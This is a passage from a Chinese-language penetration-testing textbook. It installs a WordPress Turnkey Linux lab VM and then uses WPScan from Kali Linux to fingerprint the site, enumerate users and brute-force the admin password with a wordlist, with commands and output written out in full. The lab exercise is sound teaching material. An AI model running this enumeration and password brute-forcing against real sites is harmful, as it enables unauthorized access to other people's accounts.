今天越來越多的企業利用SAAS(Software as a Service)工具應用在他們的業務中。例如,他們經常使用WordPress作為他們網站的內容管理系統,或者在局域網中使用Drupal框架。從這些應用程序中找到漏洞,是非常有價值的。
為了收集用於測試的應用程序,Turnkey Linux是一個非常好的資源。Turnkey工具的官方網站是http://www.turnkeylinux.org。本節將下載最流行的WordPress Turnkey Linux發行版。
3.2.1 獲取WordPress應用程序
獲取WordPress應用程序的具體操作步驟如下所示。
(1)在瀏覽器中輸入http://www.turnkeylinux.org地址,打開的界面如圖3.8所示。從該界面下載TurnkeyLinux。
圖3.8 Turnkey主頁
(2)在該頁面列出了許多程序,可以通過向下滾動鼠標查看。由於篇幅的原因,圖3.8只截取了一少部分內容。在該頁面中,用戶可以嘗試使用各種軟件查找漏洞,並通過工具對這些應用程序來測試用戶的技術。本例中將選擇測試WordPress,向下滾動鼠標可以看到Instant Search對話框,如圖3.9所示。
圖3.9 立即搜索
(3)在該對話框中輸入WordPress,然后按下回車鍵,將顯示如圖3.10所示的界面。
圖3.10 WordPress應用程序
(4)在該界面可以看到WordPress程序已經找到,此時單擊WordPress-Blog Publishing Platform鏈接進入下載頁面,如圖3.11所示。
圖3.11 Turnkey下載頁面
(5)在該界面選擇下載ISO映像文件。單擊220MB ISO鏈接,將顯示如圖3.12所示的界面。
圖3.12 設置郵箱地址
(6)該界面提示為了安全,需要填寫一個郵箱地址。填寫完后,單擊Subscribe and go straight to download按鈕,將開始下載Turnkey WordPress軟件。
3.2.2 安裝WordPress Turnkey Linux
本小節將介紹在VMware Workstation中安裝WordPress Turnkey Linux。關於VMware Workstation的使用,在第1章中已經詳細介紹過,這里就不再贅述。安裝WordPress Turnkey Linux的具體操作步驟如下所示。
(1)將前面下載的ISO文件導入到光驅中,然后啟動此虛擬機,將顯示如圖3.13所示的界面。
圖3.13 TURNKEY初始界面
(2)在該界面選擇Install to hard disk選項,按下“回車鍵”,將顯示如圖3.14所示的界面。
圖3.14 選擇分區方法
(3)該界面是選擇分區的方法。該系統提供了三種方法,分別是使用整個磁盤並設置LVM、使用整個磁盤和手動分區。這里選擇第一種,然后單擊OK按鈕,將顯示如圖3.15所示的界面。
圖3.15 將數據寫入磁盤
(4)該界面顯示了分區的信息,這里提示是否將寫入改變磁盤並配置LVM呢?如果想要重新分配分區的話,就單擊No按鈕,否則單擊Yes按鈕。本例中單擊Yes按鈕,將顯示如圖3.16所示的界面。
圖3.16 LVM信息
(5)該界面顯示了LVM的配置信息。單擊OK按鈕,將顯示如圖3.17所示的界面。
圖3.17 使用引導分區的卷組
(6)該界面提示使用引導分區的卷組來安裝系統。此時,單擊OK按鈕,將顯示如圖3.18所示的界面。
圖3.18 磁盤分區表
(7)該界面顯示了磁盤的分區表信息,此時提示是否要寫入數據。這里單擊Yes按鈕,將顯示如圖3.19所示的界面。
圖3.19 復制數據到磁盤
(8)該界面顯示了復制數據的磁盤的一個進度。復制完后,將顯示如圖3.20所示的 界面。
圖3.20 安裝GRUB引導
(9)該界面提示是否安裝GRUB引導加載程序的主引導記錄。這里單擊Yes按鈕,將顯示如圖3.21所示的界面。
圖3.21 是否重啟系統
(10)該界面顯示WordPress Turnkey Linux已經安裝完成,是否現在重新啟動系統。單擊Yes按鈕,將顯示如圖3.22所示的界面。
圖3.22 Root密碼
(11)在該界面為Root用戶設置一個密碼。輸入密碼后,單擊OK按鈕,將顯示如圖3.23所示的界面。
圖3.23 Root確認密碼
(12)該界面要求再次為Root用戶輸入相同的密碼,單擊OK按鈕,將顯示如圖3.24所示的界面。
圖3.24 MySQL密碼
(13)在該界面為MySQL服務的Root用戶設置一個密碼,設置完后單擊OK按鈕,將顯示如圖3.25所示的界面。
圖3.25 MySQL確認密碼
(14)在該界面再次為MySQL服務的Root用戶輸入相同的密碼,然后單擊OK按鈕,將顯示如圖3.26所示的界面。
圖3.26 Wordpress用戶admin密碼
(15)在該界面要求為Wordpress的用戶admin設置一個密碼,輸入密碼后,單擊OK按鈕,將顯示如圖3.27所示的界面。
圖3.27 Wordpress用戶admin確認密碼
(16)在該界面再次為Wordpress用戶admin輸入相同的密碼,然后單擊OK按鈕,將顯示如圖3.28所示的界面。
圖3.28 設置郵件地址
(17)該界面提示為Wordpress用戶admin設置一個郵件地址,這里使用默認的admin@example.com。然后單擊Apply按鈕,將顯示如圖3.29所示的界面。
圖3.29 Initialize Hub Services
(18)該界面顯示了初始化Hub服務信息,在該界面單擊Skip按鈕,將顯示如圖3.30所示的界面。
圖3.30 Security updates
(19)該界面提示是否現在安裝安全更新,這里單擊Install按鈕,將顯示如圖3.31所示的界面。
圖3.31 WORDPRESS appliance services
(20)該界面顯示了WordPress應用服務的詳細信息,如Web地址、Web shell地址和端口、Webmin地址、PHPMyAdmin地址和端口及SSH/SFTP地址和端口等。此時,表明WordPress Turnkey Linux就可以使用了。
3.2.3 攻擊WordPress應用程序
上一小節介紹了WordPress虛擬機的安裝。現在就可以啟動WordPress虛擬機,在Kali Linux下使用WPScan攻擊它。WPScan是一個黑盒安全掃描器,它允許用戶查找Word Press安裝版的一些已知的安全漏洞。本小節將介紹使用WPScan工具攻擊WordPress應用程序。
WPScan在Kali Linux中已經默認安裝。它的語法格式如下所示:
wpscan [選項] [測試]
常用的選項如下所示。
- --update:更新到最新版本。
- --url|-u <target url>:指定掃描WordPress的URL(統一資源定位符)或域名。
- --force |-f:如果遠程站點正運行WordPress,強制WPScan不檢查。
- --enumerate |-e [option(s)]:計算。該參數可用的選項有u、u[10-20]、p、vp、ap、tt、t、vt和at。其中u表示用戶名從id1到10;u[10-20]表示用戶名從id10到20([]中的字符必須寫);p表示插件程序;vp表示僅漏洞插件程序;ap表示所有插件程序(可能需要一段時間);tt表示timthumbs;t表示主題;vt表示僅漏洞主題;at表示所有主題(可能需要一段時間)。
【實例3-1】使用WPScan攻擊WordPress程序的具體操作步驟如下所示。
(1)在Kali Linux下,查看WPScan的幫助信息。執行命令如下所示:
root@localhost:~# wpscan -h
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version v2.2
Sponsored by the RandomStorm Open Source Initiative
@_WPScan_, @ethicalhack3r, @erwan_lr, @gbrindisi, @_FireFart_
_______________________________________________________________
Help :
Some values are settable in conf/browser.conf.json :
user-agent, proxy, proxy-auth, threads, cache timeout and request timeout
......
m conf/browser.conf.json).
--basic-auth <username:password> Set the HTTP Basic authentication
--wordlist | -w <wordlist> Supply a wordlist for the password bruter and do the brute.
--threads | -t <number of threads> The number of threads to use when multi-threading
requests. (will override the value from conf/browser. conf.json)
--username | -U <username> Only brute force the supplied username.
--help | -h This help screen.
--verbose | -v Verbose output.
Examples :
-Further help ...
ruby ./wpscan.rb --help
-Do 'non-intrusive' checks ...
ruby ./wpscan.rb --url www.example.com
-Do wordlist password brute force on enumerated users using 50 threads ...
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50
-Do wordlist password brute force on the 'admin' username only ...
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin
......
執行以上命令后,會輸出大量信息。輸出的信息中顯示了WPScan的版本信息、使用方法及WPScan的例子等。由於篇幅的原因,這里貼了一部分內容,其他使用省略號(……)取代。
(2)使用WPScan攻擊WordPress虛擬機。本例中,WordPress的IP地址是192.168.41.130。執行命令如下所示:
root@localhost:~# wpscan -u 192.168.41.130
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ /| ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version v2.2
Sponsored by the RandomStorm Open Source Initiative
@_WPScan_, @ethicalhack3r, @erwan_lr, @gbrindisi, @_FireFart_
_______________________________________________________________
| URL: http://192.168.41.130/
| Started: Thu Apr 17 13:49:37 2014
[!] The WordPress 'http://192.168.41.130/readme.html' file exists
[+] Interesting header: SERVER: Apache/2.2.22 (Debian)
[+] Interesting header: X-POWERED-BY: PHP/5.4.4-14+deb7u8
[+] XML-RPC Interface available under: http://192.168.41.130/xmlrpc.php
[+] WordPress version 3.6.1 identified from meta generator
[+] WordPress theme in use: twentythirteen v1.0
| Name: twentythirteen v1.0
| Location: http://192.168.41.130/wp-content/themes/twentythirteen/
[+] Enumerating plugins from passive detection ...
No plugins found
[+] Finished: Thu Apr 17 13:49:41 2014
[+] Memory used: 2.414 MB
[+] Elapsed time: 00:00:03
輸出的信息顯示了WPScan一個簡單的攻擊過程。
(3)列出用戶名列表,執行命令如下所示:
root@localhost:~# wpscan -u 192.168.41.130 -e u vp
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version v2.2
Sponsored by the RandomStorm Open Source Initiative
@_WPScan_, @ethicalhack3r, @erwan_lr, @gbrindisi, @_FireFart_
_______________________________________________________________
| URL: http://192.168.41.130/
| Started: Thu Apr 17 13:50:49 2014
[!] The WordPress 'http://192.168.41.130/readme.html' file exists
[+] Interesting header: SERVER: Apache/2.2.22 (Debian)
[+] Interesting header: X-POWERED-BY: PHP/5.4.4-14+deb7u8
[+] XML-RPC Interface available under: http://192.168.41.130/xmlrpc.php
[+] WordPress version 3.6.1 identified from meta generator
[+] WordPress theme in use: twentythirteen v1.0
| Name: twentythirteen v1.0
| Location: http://192.168.41.130/wp-content/themes/twentythirteen/
[+] Enumerating plugins from passive detection ...
No plugins found
[+] Enumerating usernames ...
[+] We found the following 1 user/s:
+----+-------+-------+
| Id | Login | Name |
+----+-------+-------+
| 1 | admin | admin |
+----+-------+-------+
[+] Finished: Thu Apr 17 13:50:54 2014
[+] Memory used: 2.379 MB
[+] Elapsed time: 00:00:04
從輸出的信息中可以看到當前系統中只有一個用戶,名為admin。
(4)為WPScan指定一個wordlist文件,使用--wordlist <path to file>選項。執行命令如下所示:
root@localhost:~# wpscan -u 192.168.41.130 -e u --wordlist /root/ wordlist.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version v2.2
Sponsored by the RandomStorm Open Source Initiative
@_WPScan_, @ethicalhack3r, @erwan_lr, @gbrindisi, @_FireFart_
_______________________________________________________________
| URL: http://192.168.41.130/
| Started: Thu Apr 17 13:54:51 2014
[!] The WordPress 'http://192.168.41.130/readme.html' file exists
[+] Interesting header: SERVER: Apache/2.2.22 (Debian)
[+] Interesting header: X-POWERED-BY: PHP/5.4.4-14+deb7u8
[+] XML-RPC Interface available under: http://192.168.41.130/xmlrpc.php
[+] WordPress version 3.6.1 identified from meta generator
[+] WordPress theme in use: twentythirteen v1.0
| Name: twentythirteen v1.0
| Location: http://192.168.41.130/wp-content/themes/twentythirteen/
[+] Enumerating plugins from passive detection ...
No plugins found
[+] Enumerating usernames ...
[+] We found the following 1 user/s:
+----+-------+-------+
| Id | Login | Name |
+----+-------+-------+
| 1 | admin | admin |
+----+-------+-------+
[+] Starting the password brute forcer
Brute Forcing 'admin' Time: 00:00:00 < > (59 / 20575) 0.28%
ETA: 00:00:00
[SUCCESS] Login : admin Password : 123456
+----+-------+-------+----------+
| Id | Login | Name | Password |
+----+-------+-------+----------+
| 1 | admin | admin | 123456 |
+----+-------+-------+----------+
[+] Finished: Thu Apr 17 13:54:56 2014
[+] Memory used: 2.508 MB
[+] Elapsed time: 00:00:05
從輸出的信息中,可以看到WordPress用戶admin的密碼已被破解出。